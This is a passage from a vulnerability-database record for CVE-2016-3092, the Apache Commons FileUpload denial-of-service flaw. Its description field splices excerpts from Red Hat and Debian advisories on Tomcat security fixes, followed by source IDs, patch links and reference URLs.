Processor cache multiple times allowing information leakage between\nrequests including, and not limited to, session ID and the response body. \n(CVE-2016-8745)\n\n* The Realm implementations did not process the supplied password if the\nsupplied user name did not exist. This made a timing attack possible to\ndetermine valid user names. Note that the default configuration includes\nthe LockOutRealm which makes exploitation of this vulnerability harder. (CVE-2016-5018)\n\n* It was discovered that when a SecurityManager is configured Tomcat\u0027s\nsystem property replacement feature for configuration files could be used\nby a malicious web application to bypass the SecurityManager and read\nsystem properties that should not be visible. (CVE-2016-6794)\n\n* It was discovered that a malicious web application could bypass a\nconfigured SecurityManager via manipulation of the configuration parameters\nfor the JSP Servlet. These\npackages provide a number of enhancements over the previous version of Red\nHat JBoss Web Server. \n\nUsers of Red Hat JBoss Web Server are advised to upgrade to these updated\npackages, which add this enhancement. Solution:\n\nBefore applying the update, back up your existing Red Hat JBoss Web Server\ninstallation (including all applications and configuration files). \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: tomcat security, bug fix, and enhancement update\nAdvisory ID: RHSA-2016:2599-02\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2016-2599.html\nIssue date: 2016-11-03\nCVE Names: CVE-2015-5174 CVE-2015-5345 CVE-2015-5351 \n CVE-2016-0706 CVE-2016-0714 CVE-2016-0763 \n CVE-2016-3092 \n=====================================================================\n\n1. Summary:\n\nAn update for tomcat is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - noarch\nRed Hat Enterprise Linux Client Optional (v. 7) - noarch\nRed Hat Enterprise Linux ComputeNode (v. 7) - noarch\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch\nRed Hat Enterprise Linux Server (v. 7) - noarch\nRed Hat Enterprise Linux Server Optional (v. 7) - noarch\nRed Hat Enterprise Linux Workstation (v. 7) - noarch\nRed Hat Enterprise Linux Workstation Optional (v. 7) - noarch\n\n3. Description:\n\nApache Tomcat is a servlet container for the Java Servlet and JavaServer\nPages (JSP) technologies. \n\nThe following packages have been upgraded to a newer upstream version:\ntomcat (7.0.69). (BZ#1287928)\n\nSecurity Fix(es):\n\n* A CSRF flaw was found in Tomcat\u0027s the index pages for the Manager and\nHost Manager applications. These applications included a valid CSRF token\nwhen issuing a redirect as a result of an unauthenticated request to the\nroot of the web application. This token could then be used by an attacker\nto perform a CSRF attack. (CVE-2015-5351)\n\n* It was found that several Tomcat session persistence mechanisms could\nallow a remote, authenticated user to bypass intended SecurityManager\nrestrictions and execute arbitrary code in a privileged context via a web\napplication that placed a crafted object in a session. (CVE-2016-0714)\n\n* A security manager bypass flaw was found in Tomcat that could allow\nremote, authenticated users to access arbitrary application data,\npotentially resulting in a denial of service. (CVE-2016-0763)\n\n* A denial of service vulnerability was identified in Commons FileUpload\nthat occurred when the length of the multipart boundary was just below the\nsize of the buffer (4096 bytes) used to read the uploaded file if the\nboundary was the typical tens of bytes long. (CVE-2016-3092)\n\n* A directory traversal flaw was found in Tomcat\u0027s RequestUtil.java. A\nremote, authenticated user could use this flaw to bypass intended\nSecurityManager restrictions and list a parent directory via a \u0027/..\u0027 in a\npathname used by a web application in a getResource, getResourceAsStream,\nor getResourcePaths call. (CVE-2015-5174)\n\n* It was found that Tomcat could reveal the presence of a directory even\nwhen that directory was protected by a security constraint. A user could\nmake a request to a directory via a URL not ending with a slash and,\ndepending on whether Tomcat redirected that request, could confirm whether\nthat directory existed. (CVE-2015-5345)\n\n* It was found that Tomcat allowed the StatusManagerServlet to be loaded by\na web application when a security manager was configured. This allowed a\nweb application to list all deployed web applications and expose sensitive\ninformation such as session IDs. (CVE-2016-0706)\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.3 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1133070 - Need to include full implementation of tomcat-juli.jar and tomcat-juli-adapters.jar\n1201409 - Fix the broken tomcat-jsvc service unit\n1208402 - Mark web.xml in tomcat-admin-webapps as config file\n1221896 - tomcat.service loads /etc/sysconfig/tomcat without shell expansion\n1229476 - Tomcat startup ONLY options\n1240279 - The command tomcat-digest doesn\u0027t work with RHEL 7\n1265698 - CVE-2015-5174 tomcat: URL Normalization issue\n1277197 - tomcat user has non-existing default shell set\n1287928 - Rebase tomcat to 7.0.69 or backport features\n1311076 - CVE-2015-5351 tomcat: CSRF token leak\n1311082 - CVE-2016-0714 tomcat: Security Manager bypass via persistence mechanisms\n1311087 - CVE-2016-0706 tomcat: security manager bypass via StatusManagerServlet\n1311089 - CVE-2015-5345 tomcat: directory disclosure\n1311093 - CVE-2016-0763 tomcat: security manager bypass via setGlobalContext()\n1311622 - Getting NoSuchElementException while handling attributes with empty string value in tomcat 7.0.54\n1320853 - Add HSTS support\n1327326 - rpm -V tomcat fails on /var/log/tomcat/catalina.out\n1347774 - The security manager doesn\u0027t work correctly (JSPs cannot be compiled)\n1347860 - The systemd service unit does not allow tomcat to shut down gracefully\n1349468 - CVE-2016-3092 tomcat: Usage of vulnerable FileUpload package can result in denial of service\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\ntomcat-7.0.69-10.el7.src.rpm\n\nnoarch:\ntomcat-servlet-3.0-api-7.0.69-10.el7.noarch.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nnoarch:\ntomcat-7.0.69-10.el7.noarch.rpm\ntomcat-admin-webapps-7.0.69-10.el7.noarch.rpm\ntomcat-docs-webapp-7.0.69-10.el7.noarch.rpm\ntomcat-el-2.2-api-7.0.69-10.el7.noarch.rpm\ntomcat-javadoc-7.0.69-10.el7.noarch.rpm\ntomcat-jsp-2.2-api-7.0.69-10.el7.noarch.rpm\ntomcat-jsvc-7.0.69-10.el7.noarch.rpm\ntomcat-lib-7.0.69-10.el7.noarch.rpm\ntomcat-webapps-7.0.69-10.el7.noarch.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\ntomcat-7.0.69-10.el7.src.rpm\n\nnoarch:\ntomcat-servlet-3.0-api-7.0.69-10.el7.noarch.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nnoarch:\ntomcat-7.0.69-10.el7.noarch.rpm\ntomcat-admin-webapps-7.0.69-10.el7.noarch.rpm\ntomcat-docs-webapp-7.0.69-10.el7.noarch.rpm\ntomcat-el-2.2-api-7.0.69-10.el7.noarch.rpm\ntomcat-javadoc-7.0.69-10.el7.noarch.rpm\ntomcat-jsp-2.2-api-7.0.69-10.el7.noarch.rpm\ntomcat-jsvc-7.0.69-10.el7.noarch.rpm\ntomcat-lib-7.0.69-10.el7.noarch.rpm\ntomcat-webapps-7.0.69-10.el7.noarch.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\ntomcat-7.0.69-10.el7.src.rpm\n\nnoarch:\ntomcat-7.0.69-10.el7.noarch.rpm\ntomcat-admin-webapps-7.0.69-10.el7.noarch.rpm\ntomcat-el-2.2-api-7.0.69-10.el7.noarch.rpm\ntomcat-jsp-2.2-api-7.0.69-10.el7.noarch.rpm\ntomcat-lib-7.0.69-10.el7.noarch.rpm\ntomcat-servlet-3.0-api-7.0.69-10.el7.noarch.rpm\ntomcat-webapps-7.0.69-10.el7.noarch.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nnoarch:\ntomcat-7.0.69-10.el7.noarch.rpm\ntomcat-admin-webapps-7.0.69-10.el7.noarch.rpm\ntomcat-docs-webapp-7.0.69-10.el7.noarch.rpm\ntomcat-el-2.2-api-7.0.69-10.el7.noarch.rpm\ntomcat-javadoc-7.0.69-10.el7.noarch.rpm\ntomcat-jsp-2.2-api-7.0.69-10.el7.noarch.rpm\ntomcat-jsvc-7.0.69-10.el7.noarch.rpm\ntomcat-lib-7.0.69-10.el7.noarch.rpm\ntomcat-webapps-7.0.69-10.el7.noarch.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\ntomcat-7.0.69-10.el7.src.rpm\n\nnoarch:\ntomcat-7.0.69-10.el7.noarch.rpm\ntomcat-admin-webapps-7.0.69-10.el7.noarch.rpm\ntomcat-el-2.2-api-7.0.69-10.el7.noarch.rpm\ntomcat-jsp-2.2-api-7.0.69-10.el7.noarch.rpm\ntomcat-lib-7.0.69-10.el7.noarch.rpm\ntomcat-servlet-3.0-api-7.0.69-10.el7.noarch.rpm\ntomcat-webapps-7.0.69-10.el7.noarch.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nnoarch:\ntomcat-docs-webapp-7.0.69-10.el7.noarch.rpm\ntomcat-javadoc-7.0.69-10.el7.noarch.rpm\ntomcat-jsvc-7.0.69-10.el7.noarch.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-5174\nhttps://access.redhat.com/security/cve/CVE-2015-5345\nhttps://access.redhat.com/security/cve/CVE-2015-5351\nhttps://access.redhat.com/security/cve/CVE-2016-0706\nhttps://access.redhat.com/security/cve/CVE-2016-0714\nhttps://access.redhat.com/security/cve/CVE-2016-0763\nhttps://access.redhat.com/security/cve/CVE-2016-3092\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/7/html/7.3_Release_Notes/index.html\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFYGv0mXlSAg2UNWIIRAq74AJ9mIwnepxw2jbrHnfK3Gkc+N7uMIACfXM+E\n5lVH/+qu5TZIB819MY4FTO0=\n=u+za\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. A remote attacker can take advantage of this flaw\nby sending file upload requests that cause the HTTP server using the\nApache Commons Fileupload library to become unresponsive, preventing the\nserver from servicing other requests. \n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1.3.1-1+deb8u1. \n\nFor the testing distribution (stretch), this problem has been fixed\nin version 1.3.2-1. \n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.3.2-1. \n\nWe recommend that you upgrade your libcommons-fileupload-java packages. It contains security fixes for the Tomcat 7\ncomponent. Only users of the Tomcat 7 component in JBoss Web Server need to\napply the fixes delivered in this release. (CVE-2016-3092)\n\n* A session fixation flaw was found in the way Tomcat recycled the\nrequestedSessionSSL field. If at least one web application was configured\nto use the SSL session ID as the HTTP session ID, an attacker could reuse a\npreviously used session ID for further requests. (CVE-2016-0706)\n\n4. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-5346\nhttps://access.redhat.com/security/cve/CVE-2015-5351\nhttps://access.redhat.com/security/cve/CVE-2016-0706\nhttps://access.redhat.com/security/cve/CVE-2016-0714\nhttps://access.redhat.com/security/cve/CVE-2016-0763\nhttps://access.redhat.com/security/cve/CVE-2016-3092\nSecurity Impact: https://access.redhat.com/security/updates/classification/#important\n\n8. It includes bug fixes and enhancements. The\nJBoss server process must be restarted for the update to take effect. (CVE-2016-3092)\n\n4",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-3092"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-000121"
},
{
"db": "BID",
"id": "91453"
},
{
"db": "VULMON",
"id": "CVE-2016-3092"
},
{
"db": "PACKETSTORM",
"id": "139722"
},
{
"db": "PACKETSTORM",
"id": "139166"
},
{
"db": "PACKETSTORM",
"id": "142561"
},
{
"db": "PACKETSTORM",
"id": "139162"
},
{
"db": "PACKETSTORM",
"id": "141513"
},
{
"db": "PACKETSTORM",
"id": "139165"
},
{
"db": "PACKETSTORM",
"id": "139536"
},
{
"db": "PACKETSTORM",
"id": "137727"
},
{
"db": "PACKETSTORM",
"id": "139771"
},
{
"db": "PACKETSTORM",
"id": "139163"
}
],
"trust": 2.88
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-3092",
"trust": 3.2
},
{
"db": "JVN",
"id": "JVN89379547",
"trust": 2.2
},
{
"db": "JVNDB",
"id": "JVNDB-2016-000121",
"trust": 1.9
},
{
"db": "BID",
"id": "91453",
"trust": 1.4
},
{
"db": "SECTRACK",
"id": "1036427",
"trust": 1.1
},
{
"db": "SECTRACK",
"id": "1037029",
"trust": 1.1
},
{
"db": "SECTRACK",
"id": "1036900",
"trust": 1.1
},
{
"db": "SECTRACK",
"id": "1039606",
"trust": 1.1
},
{
"db": "VULMON",
"id": "CVE-2016-3092",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "139722",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "139166",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "142561",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "139162",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "141513",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "139165",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "139536",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "137727",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "139771",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "139163",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-3092"
},
{
"db": "BID",
"id": "91453"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-000121"
},
{
"db": "PACKETSTORM",
"id": "139722"
},
{
"db": "PACKETSTORM",
"id": "139166"
},
{
"db": "PACKETSTORM",
"id": "142561"
},
{
"db": "PACKETSTORM",
"id": "139162"
},
{
"db": "PACKETSTORM",
"id": "141513"
},
{
"db": "PACKETSTORM",
"id": "139165"
},
{
"db": "PACKETSTORM",
"id": "139536"
},
{
"db": "PACKETSTORM",
"id": "137727"
},
{
"db": "PACKETSTORM",
"id": "139771"
},
{
"db": "PACKETSTORM",
"id": "139163"
},
{
"db": "NVD",
"id": "CVE-2016-3092"
}
]
},
"id": "VAR-201607-0321",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.75
},
"last_update_date": "2024-11-29T21:28:05.043000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Fwd: CVE-2016-3092: Apache Commons Fileupload information disclosure vulnerability",
"trust": 0.8,
"url": "https://mail-archives.apache.org/mod_mbox/www-announce/201606.mbox/%3C45A20804-ABFF-4FED-A297-69AC95AB9A3F@apache.org%3E"
},
{
"title": "Download Apache Commons FileUpload -- Apache Commons FileUpload 1.3.2",
"trust": 0.8,
"url": "https://commons.apache.org/proper/commons-fileupload/download_fileupload.cgi"
},
{
"title": "Fixed in Apache Tomcat 8.5.3 and 8.0.36",
"trust": 0.8,
"url": "https://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.3_and_8.0.36"
},
{
"title": "Fixed in Apache Tomcat 7.0.70",
"trust": 0.8,
"url": "https://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.70"
},
{
"title": "Fixed in Apache Tomcat 9.0.0.M8",
"trust": 0.8,
"url": "https://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.0.M8"
},
{
"title": "Revision 1743480",
"trust": 0.8,
"url": "http://svn.apache.org/viewvc?view=revision\u0026revision=1743480"
},
{
"title": "Revision 1743722",
"trust": 0.8,
"url": "http://svn.apache.org/viewvc?view=revision\u0026revision=1743722"
},
{
"title": "Revision 1743738",
"trust": 0.8,
"url": "http://svn.apache.org/viewvc?view=revision\u0026revision=1743738"
},
{
"title": "Revision 1743742",
"trust": 0.8,
"url": "http://svn.apache.org/viewvc?view=revision\u0026revision=1743742"
},
{
"title": "DSA-3609",
"trust": 0.8,
"url": "https://www.debian.org/security/2016/dsa-3609"
},
{
"title": "DSA-3611",
"trust": 0.8,
"url": "https://www.debian.org/security/2016/dsa-3611"
},
{
"title": "DSA-3614",
"trust": 0.8,
"url": "https://www.debian.org/security/2016/dsa-3614"
},
{
"title": "CVE-2016-3092(JVN#89379547)",
"trust": 0.8,
"url": "http://www.fujitsu.com/jp/products/software/resources/condition/security/vulnerabilities/2016/index.html#CVE-2016-3092"
},
{
"title": "HS16-026",
"trust": 0.8,
"url": "http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS16-026/index.html"
},
{
"title": "HS16-029",
"trust": 0.8,
"url": "http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS16-029/index.html"
},
{
"title": "HS16-030",
"trust": 0.8,
"url": "http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS16-030/index.html"
},
{
"title": "hitachi-sec-2017-105",
"trust": 0.8,
"url": "http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/hitachi-sec-2017-105/index.html"
},
{
"title": "HS16-022",
"trust": 0.8,
"url": "http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS16-022/index.html"
},
{
"title": "HPSBGN03631",
"trust": 0.8,
"url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05204371"
},
{
"title": "NV16-018",
"trust": 0.8,
"url": "http://jpn.nec.com/security-info/secinfo/nv16-018.html"
},
{
"title": "Oracle Solaris Third Party Bulletin - July 2016",
"trust": 0.8,
"url": "http://www.oracle.com/technetwork/topics/security/bulletinjul2016-3090568.html"
},
{
"title": "TERASOLUNA Framework",
"trust": 0.8,
"url": "https://en.osdn.jp/projects/terasoluna/"
},
{
"title": "Bug 1349468",
"trust": 0.8,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1349468"
},
{
"title": "USN-3024-1",
"trust": 0.8,
"url": "http://www.ubuntu.com/usn/USN-3024-1/"
},
{
"title": "USN-3027-1",
"trust": 0.8,
"url": "http://www.ubuntu.com/usn/USN-3027-1/"
},
{
"title": "Red Hat: Moderate: Red Hat JBoss Enterprise Application Platform 6.4.11 update on RHEL 7",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20162069 - Security Advisory"
},
{
"title": "Red Hat: Moderate: jboss-ec2-eap security and enhancement update for EAP 6.4.11",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20162072 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat JBoss Enterprise Application Platform 6.4.11 update on RHEL 6",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20162068 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat JBoss Enterprise Application Platform 6.4.11 update on RHEL 5",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20162070 - Security Advisory"
},
{
"title": "Debian Security Advisories: DSA-3611-1 libcommons-fileupload-java -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=824a6eb444fe6417647eb1c1fb51c0f6"
},
{
"title": "Ubuntu Security Notice: tomcat8 vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-3027-1"
},
{
"title": "Red Hat: Important: Red Hat JBoss Web Server 2.1.2 security update for Tomcat 7",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20162807 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Web Server 2.1.2 security update for Tomcat 7",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20162808 - Security Advisory"
},
{
"title": "Amazon Linux AMI: ALAS-2016-736",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2016-736"
},
{
"title": "Red Hat: CVE-2016-3092",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2016-3092"
},
{
"title": "Red Hat: Important: Red Hat JBoss Web Server security and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20170457 - Security Advisory"
},
{
"title": "IBM: Security Bulletin: A vulnerability in Apache Commons Fileupload affects IBM Tivoli Business Service Manager (CVE-2013-2186, CVE-2013-0248, CVE-2016-3092, CVE-2014-0050, 220723)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=8bc75a85691b82e540dfdc9fe13fab57"
},
{
"title": "Ubuntu Security Notice: tomcat6, tomcat7 vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-3024-1"
},
{
"title": "Debian Security Advisories: DSA-3609-1 tomcat8 -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=35ca6a1e2d09521d71af74a1e27d6cbd"
},
{
"title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - July 2016",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=ac5af5dd99788925425f5747ec672707"
},
{
"title": "IBM: IBM Security Bulletin: IBM Security Privileged Identity Manager is affected by multiple security vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=8580d3cd770371e2ef0f68ca624b80b0"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - July 2017",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=2f446a7e1ea263c0c3a365776c6713f2"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - July 2018",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=5f8c525f1408011628af1792207b2099"
},
{
"title": "IBM: IBM Security Bulletin: IBM has announced a release for IBM Security Identity Governance and Intelligence in response to multiple security vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=55ea315dfb69fce8383762ac64250315"
},
{
"title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2016",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=13f3551b67d913fba90df4b2c0dae0bf"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - April 2018",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4019ca77f50c7a34e4d97833e6f3321e"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - April 2017",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=143b3fb255063c81571469eaa3cf0a87"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - October 2017",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-3092"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-000121"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-000121"
},
{
"db": "NVD",
"id": "CVE-2016-3092"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "http://jvn.jp/en/jp/jvn89379547/index.html"
},
{
"trust": 1.4,
"url": "http://www.oracle.com/technetwork/topics/security/bulletinjul2016-3090568.html"
},
{
"trust": 1.4,
"url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html"
},
{
"trust": 1.4,
"url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html"
},
{
"trust": 1.2,
"url": "http://www.securityfocus.com/bid/91453"
},
{
"trust": 1.2,
"url": "https://security.gentoo.org/glsa/201705-09"
},
{
"trust": 1.2,
"url": "http://rhn.redhat.com/errata/rhsa-2017-0457.html"
},
{
"trust": 1.2,
"url": "http://rhn.redhat.com/errata/rhsa-2016-2807.html"
},
{
"trust": 1.2,
"url": "http://rhn.redhat.com/errata/rhsa-2016-2599.html"
},
{
"trust": 1.2,
"url": "http://rhn.redhat.com/errata/rhsa-2016-2071.html"
},
{
"trust": 1.2,
"url": "http://rhn.redhat.com/errata/rhsa-2016-2070.html"
},
{
"trust": 1.2,
"url": "http://rhn.redhat.com/errata/rhsa-2016-2069.html"
},
{
"trust": 1.2,
"url": "http://rhn.redhat.com/errata/rhsa-2016-2068.html"
},
{
"trust": 1.1,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1349468"
},
{
"trust": 1.1,
"url": "http://jvndb.jvn.jp/jvndb/jvndb-2016-000121"
},
{
"trust": 1.1,
"url": "http://svn.apache.org/viewvc?view=revision\u0026revision=1743480"
},
{
"trust": 1.1,
"url": "http://svn.apache.org/viewvc?view=revision\u0026revision=1743738"
},
{
"trust": 1.1,
"url": "http://tomcat.apache.org/security-8.html"
},
{
"trust": 1.1,
"url": "http://tomcat.apache.org/security-9.html"
},
{
"trust": 1.1,
"url": "http://tomcat.apache.org/security-7.html"
},
{
"trust": 1.1,
"url": "http://svn.apache.org/viewvc?view=revision\u0026revision=1743722"
},
{
"trust": 1.1,
"url": "http://mail-archives.apache.org/mod_mbox/commons-dev/201606.mbox/%3ccaf8hoz%2bpq2qh8rnxbujyok1doz6jrtiqypac%2bh8g6ozkbg%2bcxg%40mail.gmail.com%3e"
},
{
"trust": 1.1,
"url": "http://svn.apache.org/viewvc?view=revision\u0026revision=1743742"
},
{
"trust": 1.1,
"url": "http://www.debian.org/security/2016/dsa-3614"
},
{
"trust": 1.1,
"url": "http://www.ubuntu.com/usn/usn-3027-1"
},
{
"trust": 1.1,
"url": "http://www.debian.org/security/2016/dsa-3611"
},
{
"trust": 1.1,
"url": "http://www.debian.org/security/2016/dsa-3609"
},
{
"trust": 1.1,
"url": "http://www.ubuntu.com/usn/usn-3024-1"
},
{
"trust": 1.1,
"url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05204371"
},
{
"trust": 1.1,
"url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05289840"
},
{
"trust": 1.1,
"url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05324759"
},
{
"trust": 1.1,
"url": "http://lists.opensuse.org/opensuse-updates/2016-09/msg00025.html"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id/1037029"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id/1036900"
},
{
"trust": 1.1,
"url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id/1036427"
},
{
"trust": 1.1,
"url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id/1039606"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2017:0456"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2017:0455"
},
{
"trust": 1.1,
"url": "http://rhn.redhat.com/errata/rhsa-2016-2808.html"
},
{
"trust": 1.1,
"url": "http://rhn.redhat.com/errata/rhsa-2016-2072.html"
},
{
"trust": 1.1,
"url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html"
},
{
"trust": 1.1,
"url": "https://security.netapp.com/advisory/ntap-20190212-0001/"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
},
{
"trust": 1.1,
"url": "https://security.gentoo.org/glsa/202107-39"
},
{
"trust": 1.1,
